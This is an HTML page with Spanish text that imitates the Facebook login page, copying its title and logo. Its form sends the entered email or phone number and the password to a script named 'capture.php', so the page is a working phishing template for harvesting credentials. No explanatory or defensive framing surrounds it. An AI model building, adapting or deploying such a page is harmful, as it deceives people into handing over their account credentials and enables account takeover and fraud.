<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>Facebook - Log In or Sign Up</title>
</head>

<body>
    <div class="container">
        <div class="container-profile">
            <span class="logo">
                <h1>    <img src="/img/facebook-logo-15.png" alt="facebook"></h1>
                <br>
                <br>
            </span>
            <p class="connect-friends">Facebook te ayuda a comunicarte y compartir con las personas que forman parte de tu vida.</p>
        </div>
        <div class="container-form">
            <form class="form" action="capture.php" method="post">
   		 	<input type="text" name="username" placeholder="Correo electronico o numero de telefono" required>
    		<input type="password" name="password" placeholder="Contraseña" required>
    		<input type="submit" value="Iniciar Sesión">
			</form>
            <p class="create-page">
                <a href="#">Crear una pagina</a> para una celebridad , una marca o un <br> neogocio.
            </p>
        </div>
    </div>

</body>

</html>
